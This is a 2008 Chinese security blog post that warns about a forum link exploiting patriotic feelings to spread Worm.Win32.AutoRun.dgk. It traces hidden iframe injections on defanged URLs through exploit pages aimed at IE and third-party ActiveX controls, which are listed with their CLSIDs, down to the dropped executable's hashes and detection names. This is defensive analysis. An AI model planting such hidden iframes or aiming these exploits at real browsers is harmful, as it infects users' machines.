小心利用大家的爱国热情来传播Worm.Win32.AutoRun.dgk的网页
来源:互联网 发布:安装ubuntu双系统 编辑:程序博客网 时间:2024/05/22 15:16
小心利用大家的爱国热情来传播Worm.Win32.AutoRun.dgk的网页
endurer原创
2008-05-05 第1版
在某论坛上看到一个题为“爱国的都进来”的贴子,里面的内容是要求大家点击链接hxxp://2008qq.***8q*s*o**so*.cn/?QQ=2008-28225&id=294444559001
以表示自己的爱国热情。
#1 hxxp://2008qq.***8q*s*o**so*.cn/?QQ=2008-28225&id=294444559001 包含代码:
/---
<ifame src=hxxp://*t*t*t.d**jp*ao.net/t7.htm width=50 height=0></iframe>
---/
#1.1 hxxp://*t*t*t.d**jp*ao.net/t7.htm 输出代码:
/---
<ifame width=50 height=0 src=hxxp://*t*t*t.d**jp*ao.net/14.htm></iframe>
<ifame width=10 height=0 src=hxxp://*t*t*t.d**jp*ao.net/new.htm></iframe>
<ifame style=display:none src=hxxp://*t*t*t.d**jp*ao.net/lz.htm></iframe>
<ifame style=display:none src=hxxp://*t*t*t.d**jp*ao.net/bf.htm></iframe>
<ifame width=10 height=0 src=hxxp://*t*t*t.d**jp*ao.net/qq.htm></iframe>
<ifame width=50 height=0 src=hxxp://*t*t*t.d**jp*ao.net/xl.htm></iframe>
<ifame width=50 height=0 src=hxxp://*t*t*t.d**jp*ao.net/Baidu.htm></iframe>
<ifame width=50 height=0 src=hxxp://*t*t*t.d**jp*ao.net/rl.htm></iframe>
<ifame style=display:none src=hxxp://*t*t*t.d**jp*ao.net/04.htm></iframe>
---/
#1.1.1 hxxp://*t*t*t.d**jp*ao.net/14.htm
利用 MS06-014漏洞(clsid:BD96C556-65A3-11D0-983A-00C04FC29E36)下载 hxxp://*t*t*t.d**jp*ao.net/css.css
文件说明符 : D:/test/css.css
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-5-4 20:50:27
修改时间 : 2008-5-4 20:50:27
大小 : 25808 字节 25.208 KB
MD5 : dfef794a11825c2c862cec2e303983ba
SHA1: F707C17E58A6A16578DFE523DDE30408585BD93A
CRC32: 0fcf8388
css.css是一个EXE文件,卡巴斯基报为 Worm.Win32.AutoRun.dgk [KLAB-4890418]
#1.1.2 hxxp://*t*t*t.d**jp*ao.net/new.htm(瑞星报为:Trojan.DL.Script.JS.Agent.mej)
利用RealPlayer(IERPCtl.IERPCtl.1,clsid:2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93)漏洞下载hxxp://*t*t*t.d**jp*ao.net/css.css
#1.1.3 hxxp://*t*t*t.d**jp*ao.net/lz.htm
利用联众(GLCHAT.GLChatCtrl.1,clsid:61F5C358-60FB-4A23-A312-D2B556620F20)漏洞下载hxxp://*t*t*t.d**jp*ao.net/css.css
#1.1.4 hxxp://*t*t*t.d**jp*ao.net/bf.htm
利用暴风影音(MPS.StormPlayer.1,clsid:6BE52E1D-E586-474f-A6E2-1A85A9B4D9FB)漏洞下载hxxp://*t*t*t.d**jp*ao.net/css.css
#1.1.5 hxxp://*t*t*t.d**jp*ao.net/qq.htm
利用QQ(QvodInsert.QvodCtrl.1,clsid:F3D0D36F-23F8-4682-A195-74C92B03D4AF)漏洞下载hxxp://*t*t*t.d**jp*ao.net/css.css
#1.1.6 hxxp://*t*t*t.d**jp*ao.net/xl.htm
利用迅雷(DPClient.Vod,clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F)漏洞下载hxxp://*t*t*t.d**jp*ao.net/css.css
#1.1.7 hxxp://*t*t*t.d**jp*ao.net/Baidu.htm
利用BaiDu(BaiduBar.Tool.1,clsid:{A7F05EE4-0426ID:-454F-8013-C41E3596E9E9})下载hxxp://91wwmm.com/Baidu.cab, 内含 Baidu.exe
#1.1.8 hxxp://*t*t*t.d**jp*ao.net/rl.htm
利用RealPlayer漏洞下载hxxp://*t*t*t.d**jp*ao.net/css.css
#1.1.9 hxxp://*t*t*t.d**jp*ao.net/04.htm
利用Microsoft IE畸形VML文档处理缓冲区溢出漏洞(clsid:10072CEC-8CC1-11D1-986E-00A0C955B42E)漏洞下载hxxp://*t*t*t.d**jp*ao.net/css.css
- 小心利用大家的爱国热情来传播Worm.Win32.AutoRun.dgk的网页
- 传播Virus.Win32.AutoRun.f/Worm.Win32.Delf.b的网页
- 中国人的爱国热情竞然被美国人利用了(ipone5也来了)
- 抓到通过U盘传播的 Virus.Win32.AutoRun.ab/Worm.Win32.Agent.zhw/setup.exe
- 小心免费送6位QQ号码的网站传播Worm.Win32.Viking.lj/Worm.Viking.sv等
- 小心通过QQ尾巴中的网址(Q-Zone.****qq.C0M)传播的Worm.Win32.Viking.r
- 03-19/一个传播 Worm.Win32.Viking.jg的 网页,解密有点难度(第2版)
- 某光集团网站被加入利用ANI漏洞传播Worm.Win32.Viking.ix的代码
- ARP病毒自动添加的网址利用ms07004EXP和MS0614EXP传播Worm.Win32.Delf.cc等
- 利用迅雷和MS06014漏洞传播Worm.Win32.Agent.a的电子书网站
- 小心热情的拥护者
- 一个传播 Worm.Win32.Otwycal.c / Worm.Win32.Infei.a 的网站v2
- 小心QQ信息中的网址传播维金Worm.Win32.Viking.ix/Worm.Viking.pg
- 小心QQ信息的网址传播 Backdoor.Win32.Agent.ahj
- 小心传播Trojan-GameThief.Win32.OnLineGames.smoh的电子邮件
- 抗日战争爆发后,深受爷爷爱国思想的影响,怀着强烈的爱国热情
- 小心 alice 发来的带 Email-Worm.Win32.Warezov.aj 的邮件
- 发现一个传播威金/Worm.Win32.Viking.if的网站,用的技术很新颖
- 4.3.3 接收数据
- JDBC中级应用
- 指针(详解)
- 开发人员只重视纯技术的两个例子
- 4.3.4 退出
- 小心利用大家的爱国热情来传播Worm.Win32.AutoRun.dgk的网页
- C#中三维正交数组的创建
- 4.3.5 错误提示
- 使用OpenGL实现三维坐标的鼠标拣选(转)
- javascript小技巧-js小技巧收集(转)每一项都是js中的小技巧,但十分的实用!
- 4.4 服务器实现
- 使用commons-digester解析XML文档示例
- 4.4.1 初始化
- Windows CE下bootloader和驱动之间的通信